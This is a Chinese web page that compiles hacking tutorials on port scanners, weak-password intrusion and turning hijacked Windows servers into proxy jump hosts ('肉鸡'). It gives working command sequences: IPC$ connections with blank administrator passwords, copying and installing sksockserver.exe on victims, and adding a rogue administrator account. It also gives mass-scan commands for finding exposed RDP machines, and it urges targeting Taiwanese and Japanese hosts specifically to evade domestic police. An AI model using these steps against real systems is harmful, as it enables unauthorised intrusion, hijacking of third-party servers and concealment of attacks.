端口扫描器的设计与实现_端口扫描器使用教程

端口扫描、跳板的详细教程！

特别提醒：千万不要做国内的主机啊！做日本或者 *** （台湾）吧，这样既不违反 我们国家的法律，也体现了自己的爱国心，哈哈（摘录别人的话），不过更好还是老老实实的做跳板，不要总是去想着做什么坏事。 千万不要用国内的主机做试验啊，否则等着警车来接你啦 怎样 *** *** 跳板 说明：（1）这篇文章是我自己做跳板的一点体会，是些给那些从来没有做过跳板的网友看的。做过跳板的网友就不用看了。 （2）本文讲述的是做跳板最简单，最基础的 *** ，仅仅是给新手提供一个思路，一些稍微复杂的 *** 比如unicode，CGI等等这里不讲。 （3）做跳板毕竟算是一种入侵行为，有了跳板和肉鸡以后，千万要用在该用的地方，不要刻意去“黑“别人啊！！ 准备工作： 做一件事情，至少需要两个方面的准备工作：相关的基础知识和做这件事情的工具。 基本的工具：（1）x-scan v1.3：强大的漏洞扫描工具，对于初学者来说非常好的一个工具。我们主要用他来扫描一些基本的漏洞（主要是NT弱密码），用法在后面会具体说。（其实流光很不错的，但是我觉得流光再扫NT弱密码的时候太烦了） （2）superscan：非常快速的端口扫描工具，可以在很短的时间里发现某个IP域上IP的分布。为什么用他呢？主要是避免盲目扫描，提高效率：某个 IP域上IP地址的分布不是连续的，也许他从xxx.xxx.0.0-xxx.xxx.50.255上每个IP都是有计算机存在的，而从 xxx.xxx.51.0- xxx.xxx.100.255每个IP都没有计算机存在。如果你事先不知道这一段上根本没有主机的话，花了很长时间去扫描也不会有结果,浪费时间和金钱 啊。 （3）fluxay 4.0：大名鼎鼎的扫描工具，我们主要用它的NT管道命令功能来连接目标主机，以及添加用户、远程启动服务等。注意了：更好是fluxay 4.0版本。 （4）windows2000下的c:\命令提示符工具：也就是说，跳板的 *** 至少是要在windows2000以上的操作系统下进行。 （5）sksockserver.exe：做跳板的主角，就是用它来实现远程主机的socks5 *** 功能的。 （6）全球IP地址分配表：这个对于高手来说是不必要的，用他的目的是考虑到很多以前没有做过跳板的网友对IP的分布不了解，我们主要的目标还是国外的主 机，因此对国外的IP分布有一些了解是很重要的，也是以后我们选定所要扫描的IP域的主要根据。这样的话，就省得再去用“追捕”软件查找IP的实际所在地 了。 好了工具准备完了，现在了解一下做跳板的大概过程。 注意：刚才你下载的这些东东不是放在你的硬盘上！放在什么地方呢？放在“肉鸡”上！ 就是说我们做跳板的过程是在肉鸡上完成的。 名词解释肉鸡：肉鸡是开了3389端口微软终端服务（microsoft terminal service），又有弱密码的高速服务器，俗称“肉鸡”。我们之所以要在肉鸡上做，是出于安全考虑，因为做跳板毕竟是一种非法入侵行为，我们需要隐藏自 己的踪迹，当然，不想用肉鸡也可以，前提是你有足够的带宽，而且不怕公安上门找你麻烦。（当然，进入肉鸡本身也是一种非法的入侵）。我们用 mstsc.exe这个软件登陆上肉鸡，就可以像平时我们在自己电脑上一样用鼠标控制远程的服务器（也就是肉鸡）做我们要做的事情。 过程：为了叙述的方便，先假设我们已经有了一个肉鸡。下面的步骤没有特殊说明都是在“肉 鸡”上完成的。 （1） 先在自己的机器上打开全球IP地址分配表，选取一个IP区域 （2） 登陆上肉鸡，把刚才说到的工具在肉鸡上下载好，就用肉鸡自己的IE下载就行了。 （3） 主要的过程是：先用superscan扫描（1）选定的IP区域，找到其中一个IP很集中的区域，然后放到x-scan进行漏洞扫描（因为是面对以前没有 做过跳板的网友，所以这里只介绍用NT弱密码 *** 跳板），找到若干个有弱密码的IP，把sksockserver.exe上传到目标主机上，然后远程启动 sksockserver。这样，跳板就做好了。 我们一起来实践一下，做一个跳板： （1） 刚才说过了，没有肉鸡做跳板是不行的，尤其是拨号上网的网友（速度慢）。我们首先登陆上一个已经知道的肉鸡：xxx.xxx.xxx.xxx。帮刚才上面 提到的东东都准备好。更好是集中放置，这样便于我们使用。不要到处乱放，否则主人一进来就知道有人进过他的机器。 （2） 我们选择210.85.0.0-210.85.50.255这一段IP（台湾），放在superscan里面去，把superscan的端口设置改成只有 80一个端口，然后确定，开始扫描。这时，在下面的输出框里面，就会出现一大批的活跃IP，看见了吗？210.85.0.0-210.85.40.255 这一段上都是活跃的IP。现在我们随便选一个IP区域，比如我们就选210.85.0.0-210.85.5.255这一段，不要太长，因为下一步我们要 把他们放进x-scan进行扫描，x-scan扫描速度并不是很快，太多的话，会降低效率，而且IP区域过长的话，有可能使x-scan出现误报。 x-scan的使用 *** 这里就不详细叙述了这里要做的就是：在“设置”菜单里，先选“扫描模块”，选择“开放端口”和“NT弱密码”两个选项，在“扫描参 数”里，填上我们刚才选定的IP范围：210.85.0.0-210.85.5.255，接着，在其中“端口相关设置”里，把原先一长串的端口去掉，只填 上80，3389两个端口，其他的设置就用默认的好了，不用再改了。然后就开始搜索，这需要大概你8、9分钟的时间（因为x-scan虽然简单，但是速度慢），这段时间你大可以做一点自己的其他事情，等时间差不多了，你再看看x-scan里面的结果：好的，N个机器的密码为空，这下子有收获了！但是要说的 是，x-scan有一些误报，大家一定要有耐心去试啊！ （3） 我们随便从中间随便选了一个，比如：210.85.0.14：administrator 空。接下来的事情， 是要验证它到底接不接受我们的连接，密码是不是正确。现在用到流光了，打开流光，选择“工具”里面的“ＮＴ管道远程命令”，出现对话框，把刚才的ＩＰ，用户名，密码填进去，然后回车。在界面上“ＮＴＣＭＤ”提示符后面打入ＣＭＤ，连接成功，屏幕上出现了“Ｃ：\ＷＩＮＮＴ\ ＳＹＳＴＥＭ３２”的提示符。这证明，刚才的用户名和密码是正确的，这台机器已经基本是你的了。好了，我们进去了，想想我们要做什么呢？对了，是做跳板，我们还要把sksockserver.exe放到210.85.0.14上，这样才能启动服务，让这台机器做为跳板！怎么把这个东东放上去呢： 调出肉鸡上的ＣＭＤ，在命令提示符下按下面的 *** 做： c:\net use \\210.85.0.14\ipc$ “”/user:“administrator”（建立IPC连接） 系统提示：命令成功完成。 Copy c:\sksockserver.exe \\210.85.0.14\admin$ 系统提示：成功复制一个文件。 这样我们就成功地把sksockserver.exe传到了目标主机上。接下来的任务就是把他远程启动就行了。 我们又回到刚才流光的NTCMD里，在提示符下按下面的 *** 做： c:\sksockserver –install 系统提示：snake sockproxy service installed c:\sksockserver –config port 1949（端口自己来定，这里的1949是随便选的） 系统提示：the port value have set to 1949 c:\sksockserver –config starttype 2 系统提示：the starttype have set to 2---auto c:\net start skserver 系统提示服务启动成功。 这个时候，这台机器已经成为你的跳板了。 下面简单的说一说自己找肉鸡的 *** 。 工具：（1）sockscap：强大的socks *** 调度软件。 （2）snake的 *** 跳板GUI（图形界面程序） （3）mstsc：微软terminal service终端服务的客户端程序。用于登陆3389肉 鸡。有了它，我们就可以象控制自己的机器一样控制终端服务器，做我们的事情了。 其实前面两个都是附属的工具，只有mstsc才是真正唱主角的。 Sockscap和sksockserver GUI配合实现实现跳板的使用，可以隐藏我们的 入侵痕迹。 我们现在还没有肉鸡，那么一切事情都只能在我们自己的机器上做了，如果你不放心的话 可以到网吧去做下面的事情。 但是，要提醒的是，千万不要做国内的主机啊！做日本或者 *** （台湾）吧，这样既不违反 我们国家的法律，也体现了自己的爱国心，哈哈（摘录别人的话），不过更好还是老老实实 的做跳板，不要总是去想着做什么坏事。 步骤其实跟做跳板也很相似的。刚才我们在x-scan搜索的端口里设置了3389，如果一台机 器开了3389端口，而且有了弱密码的话，那这样的机器就是所谓的“肉鸡”了。（当然输入 法漏洞有的时候也可以做成肉鸡，但是毕竟现在有输入法漏洞的机器太少了，远远不及有弱 密码的终端服务器那么多，所以我们还是选择了后者，而且输入法漏洞只适合国内机器。一 个一个去试验，真是太浪费时间了！会烦死的。） 具体搜索过程跟刚才在作跳板里是一样的，找到一个开了3389端口服务，而且有弱密码的 机器。我们在上面搜索的结果中仔细地看看，终于发现了一台：210.85.2.84:frank41:空。而 且开了3389服务。要把这台机器变成自己地机器那肯定要有自己的登录名，否则每次总是 用别人的，那还怎么叫是自己的机器？我们现在来为自己添加一个用户名，把自己提升成为 root权限，那么我们就可以做任何事情了。打开流光，选择“工具”里面的“NT管道命令” 填上刚才得到的用户名跟密码：frank41：空。然后确定，进入NTCMD界面，在提示符下 键入:CMD,连接成功以后在系统提示符下如下操作： c:\net user admin /add（添加一个admin用户） c:\net user admin shonline788（使得admin的密码是shonline788） c:\net localgroup administrators admin /add（把用户admin提升为administrator即管理员身份） 这样我们就成功的在这台机器中取得了root权限，可以作任何事情了，但是别做坏事噢。 下一步，就要用上我们刚才准备的这些工具了。在网上搞几个socks *** ，把sockscap和 sksockserverGUI设置好，把mstsc的图标拖到sockscap里去，双击mstsc的图标，在其中填 上你刚才找到的肉鸡IP：210.85.2.84,然后回车进行连接。成功以后，会出现一个跟我们平 时登陆windows2000时候一样的一个蓝色的界面，在里面填上我们刚才添加的用户名和密 码，回车登陆。登陆成功以后就会出现该主机的图形界面，这个时候你就可以象操作自己的 机器一样，操作别人的机器。至此，你已经获得了一台肉鸡。就可以做我们上面做过的事情 了。

ScanPort端口扫描器怎么使用啊

起始IP，结束IP，要扫描的端口号码，更高延迟（50可以），线程数目（速度，20左右就够了）

像一个局域网一台电脑IP为123.123.123.123，那么，一般主机一般为0（或1），也就是123.123.123.1（可作为起始） ，最后一个最多为123.123.123.255（就是结束IP）。端口号取决于你的目的，像输入7626则是冰河木马的默认后门端口.当搜索到打开了指定端口的电脑，就会在右边显示。

S扫描器怎么用啊？

s.exe这款DOS下的端口扫描工具，体积小，扫描速度惊人，但是唯一不足的是它不能在XP SP2或者内网中使用SYN方式扫描，我试过，不能扫出任何IP，用TCP倒是可以，其他都不错。

介绍一下这款小工具的语法：

S扫描器扫描命令是:

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

文件名 参数 起始IP 结束IP 要扫描的端口 保存

s SYN 61.0.0.0 61.255.255.255 1433 save

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

1433是SQL server 服务器端口

8080是 *** 服务器端口

s.exe syn 219.136.0.0 219.136.255.255 8080 700 /save

s.exe扫描器的使用说明

首先我解释下什么是S扫描器，S扫描器是针对微软ms04045漏洞出的一个扫描，原来作者出这东西的目的是为了扫描这个漏洞，但现在已经变成我们黑客手中的兵器了，大家也许看过很多如何找肉鸡的动画或刷QB的动画，那些动画里面很多都是用S扫描器来扫描肉鸡或别人电脑所开放的端口及一些漏洞，都用这工具的好处是它的扫描速度实在是一个字---强！ 今天我就来教下大家如何使用S扫描器。

简单说明下它的用处：

S扫描器是一个简单的使用两种常用的扫描方式进行端口扫描的端口扫描器程序.可实现的功能是:

1.两种不同的扫描方式(SYN扫描和一般的connect扫描)

2.可以扫描单个IP或IP段所有端口

3.可以扫描单个IP或IP段单个端口

4.可以扫描单个IP或IP段用户定义的端口

5.可以显示打开端口的banner

6.可将结果写入文件

7.TCP扫描可自定义线程数

用法:

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

scanner TCP/SYN StartIP [EndIP] Ports [Threads] [/Banner][/Save]

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

参数说明:

TCP/SYN - TCP方式扫描或SYN方式扫描(SYN扫描需要在win 2k或以上系统才行),SYN扫描对本机无效

StartIP - 起始扫描的IP

EndIP - 结束扫描的IP,可选项,如果这一项没有，就只是对单个IP扫描

Ports - 可以是单个端口，连续的一段端口或非连续的端口

Threads - 使用更大线程数去扫描(SYN扫描不需要加这一项),不能超过1024线程

/Banner - 扫描端口时一并将Banner显示出来,这一选项只对TCP扫描有效

/Save - 将结果写入当前目录的Result.txt文件中去。

我们先点击开始菜单---运行---CMD.EXE，因为我把扫描器放在F盘，你们的扫描器放哪你们就进哪里，打开S扫描器，下面举几个例子演示下S扫描器的主要几个作用。

例子一:

S TCP 218.80.12.1 218.80.12.123 80 512

TCP扫描218.80.12.1到218.80.12.123这IP段中的80端口,更大并发线程是512

例子二：

S TCP 218.80.12.1 218.80.12.123 21,5631 512 /Banner

TCP扫描218.80.12.1到218.80.12.123这IP段中的21和5631端口,更大并发线程是512,并显示Banner

例子三：

S TCP 218.80.12.1 218.80.12.12 1-200 512

TCP扫描218.80.12.1到218.80.12.12这IP段中的1到200端口,更大并发线程是512

例子四：

S TCP 218.80.12.7 1-200 512

TCP扫描218.80.12.7这IP中的1到200端口,更大并发线程是512

例子五：

S SYN 218.80.12.7 1-65535 /Save

SYN扫描218.80.12.7这IP中的1到65535端口,将结果写入Result.txt

扫描结束后Result.txt就存放在你的S扫描器所在的目录里。刚才扫描的东西都在里面。

例子六：

S SYN 218.80.12.1 218.80.12.255 21 /Save

SYN扫描218.80.12.1到218.80.12.255这IP段中的21端口,将结果写入Result.txt

这个我重点说明一下，因为这条命令就是专门用来找肉鸡的，扫描一个IP段有没有开3389的或1433的。

示范：S SYN 218.80.1.1 218.80.255.255 3389 /Save （找开放3389肉鸡的指令）

一定会有好多开了3389的，大家只要利用这指令扫到开3389的IP，再用别工具继续扫开了3389的肉鸡的弱口令，找到了马上建立管理员，登陆进去，你就算得到一个肉鸡了。

看看：

S扫描器（IP扫描器）怎么使用

打开S扫描器，下面举几个例子演示下S扫描器的主要几个作用。

例子一:

S TCP 218.80.12.1 218.80.12.123 80 512

TCP扫描218.80.12.1到218.80.12.123这IP段中的80端口,更大并发线程是512)

例子二：

S TCP 218.80.12.1 218.80.12.123 21,5631 512 /Banner

TCP扫描218.80.12.1到218.80.12.123这IP段中的21和5631端口,更大并发线程是512,并显示Banner

例子三：

S TCP 218.80.12.1 218.80.12.12 1-200 5128

TCP扫描218.80.12.1到218.80.12.12这IP段中的1到200端口,更大并发线程是512

例子四：

S TCP 218.80.12.7 1-200 512

TCP扫描218.80.12.7这IP中的1到200端口,更大并发线程是512

例子五：

S SYN 218.80.12.7 1-65535 /Save

SYN扫描218.80.12.7这IP中的1到65535端口,将结果写入Result.txt

扫描结束后Result.txt就存放在你的S扫描器所在的硬盘里，就是这个文档。刚才扫描的东西都在里面。

例子六：

S SYN 218.80.12.1 218.80.12.255 21 /Save

TCP扫描218.80.12.1到218.80.12.255这IP段中的21端口,将结果写入Result.txt

这个重点说明一下，因为这条命令就是专门用来找肉鸡的，扫描一个IP段有没有开3389的或1433的。

下面是介绍：

1、示范下：S SYN 218.80.1.1 218.80.255.255 3389 /Save （找开放3389肉鸡的指令，矮鸟要牢记哦），好多开了3389的，大家只要利用这指令扫到开3389的IP，再用别工具继续扫开了3389的肉鸡的弱口令，

2、找到了马上建立管理员，登陆进去，就算得到一个肉鸡了，由于不是教找肉鸡的，也不进行操作。

注意:

1、SYN扫描是很依赖于扫描者和被扫描者的网速的,如果是内网的系统，那不一定可以使用SYN扫描的。

因为网关的类型会决定内网系统是否能进行SYN扫描.如果配置较低的话，也不推荐使用SYN扫描。SYN扫描速度是比TCP扫描的速度快很多的，但在稳定性方面却不是太好，所以自己决定使用哪种模式进行扫描。

2、SYN扫描不需要线程那个参数，请看上面例子5和6；

3、TCP扫描的更大并发线程不能超过1024；

4、使用SYN模式扫描，不能扫描Banner,具体为什么不能，请查看有关SYN的资料。

对于有些朋友说XP-SP2不能用S扫描器，有的说可以使用，这里看来在这样的系统下也能使用,不过 是使用TCP 这种 *** 。

scanport端口扫描工具怎么用

在“开始”和“停止”处都填上路由器的IP地址，例如：192.168.0.1，将扫描端口设置为1-65350，设置完成后点击“开始”按钮，不一会就可以找到路由器的管理界面的登录端口，要测试端口是否正确，我们可以在IE地址栏中输入“：端口号，进行查看，如果端口正确，将会出现路由器的登录界面。

望采纳！

端口扫描器的用法?

扫描器使用 *** 大家好很高兴你能进如我们的第四课！由先在起所有的课将由我来主讲，由于课程涉及

的是 *** 更高安全问题，所以我不得不警告各位，你要清楚的认识到你在干什么，其实

第四课的内容我们换了又换，有很多是一些攻击性很强的，我不得不CUT，所以次文才迟

迟出来！！同时我也希望进入这一课时的学友能多多的帮助其它人！

在INTERNET安全领域，扫描器可以说是黑客的基本武器，

一个好的TCP端口扫描器相当与几百个合法用户的口令及

密码是等同的，这样说一点也不过分！

1，什么是扫描器

扫描器是一种自动检测远程或本地主机安全性弱点的程序，

通过使用扫描器你可一不留痕迹的发现远程服务器的各种TCP

端口的分配及提供的服务！和它们的软件版本！这就能让我们

间接的或直观的了解到远程主机所存在的安全问题。

2，工作原理

扫描器通过选用远程TCP/IP不同的端口的服务，并记录目标

给予的回答，通过这种 *** ，可以搜集到很多关于目标主机的

各种有用的信息（比如：是否能用匿名登陆！是否有可写的FTP

目录，是否能用TELNET，HTTPD是用ROOT还是nobady在跑！）

3，扫描器的运行平台！

尽管大多数的工作站是用UNIX的，由于UNIX的应用软件的可移殖

性，如今的扫描器以有了支持各种平台，这一点大大方便了许多

单机的用户！但同时也带来了更多的 *** 安全问题，这句老话我想

大家一定是听到过很多次！------ *** 安全刻不容缓！！！

4，扫描器能干什么？

扫描器并不是一个直接的攻击 *** 漏洞的程序，它不同于第二课中

的许多NUCK程序！它仅仅能帮助我们发现目标机的某些内在的弱点

而这些现存的弱点可能是（请看清楚可能是，并非一定）破坏目标

机安全关键，但是我想说明的是对于一个刚刚入们的黑客人来说

这些数据对他来说无疑是一个毫无价值的数据 *** ！，而对一个

掌握和精通各种 *** 应用程序的漏洞的黑客来说这就不仅仅是一个简单

的数据 *** ！他的价值远超过几百个有用的帐号！-------知识需要

积累！！！

5，种类

1。NNS( *** 安全扫描器）

用PERL编写，工作在Sunos4.1.3

进行下面的常规的扫描

Sendmail ,TFTP,匿名FTP，Hosts.equive，Xhost

增强扫描

Apple Talk,

Novell

LAN管理员 ***

取得指定域的列表或报告！

用PING命令确定指定主机是否是活性的，

扫描目标机端口

报告指定地址的漏洞

你可以到这个地址下载

2.STROBE(超级优化TCP端口检测程序）

它是一个TCP端口的扫描器，能快速的识别指定机器上正运行

什么服务，

用于扫描 *** 漏洞

SATAN(安全管理员的 *** 分析工具）

扫描远程主机的许多已知的漏洞

FTPD中可写的目录

NFS

NIS

PSH

SENDMAIL

X服务

Jakal（秘密扫描器）

可以不留痕迹的扫描

IdenTCPscan

CONNECT 扫描TFTP服务器子网

ESPScan 扫描FSP服务器

XSCAN

实例扫描

或用关键字搜寻！你能了解到更多的情况！

1，UNIX平台的SAFEsuite

safesuite的组成，INTERNET，WEB，防火墙扫描！

safesuite的攻击，sendmail,FTP,NNTP,TELNET,RPC,NFS.

ISS的开发小组在最新的版本里还增设了IP欺骗和拒绝服务的攻击，用以支持对主机安全

性的分析。

可以运行的平台：Sun OS 4.1.3 up,SoLaris 2.0 up,HP/UX9.05 up,IBM AIIX 3.2.5 u

p

Linux 1.2.x,Linux1.3.x,Linux 1.3.76+

安装：

解压后拷贝到指定的目录，你可用下面的命令来解！

tar -xvf ISS_XXX.tar

运行ISS.install开始安装！

由于扫描的结果太长我就不一一写出来了！！大家可以多试试！很多有用的安全信息都

在这些扫描结果里！！通过MIT的X窗口系统标准配置运行如SAVEsuite，X窗口的管理程

序是FVWM。

Network Toolbox

用于WINDOWS 95上的TCP/IP的应用程序，

默认扫描端口是！14个TCP/IP端口，

port 9,13,21,25,,37,79,80,110,111,512,513,514,

你可以通过设置属性来改变默认的配置！！

我不知道我上述的下载地址是否还有效！但我想你可一到一些国外著名的黑客站找到你

想要的一切！！

课后作业，请把你扫描的信息告诉我们，我们将在下一课拿出一些信息来加以分析，安

全漏洞出在哪里！并对各种可能发生的漏洞加以分析！！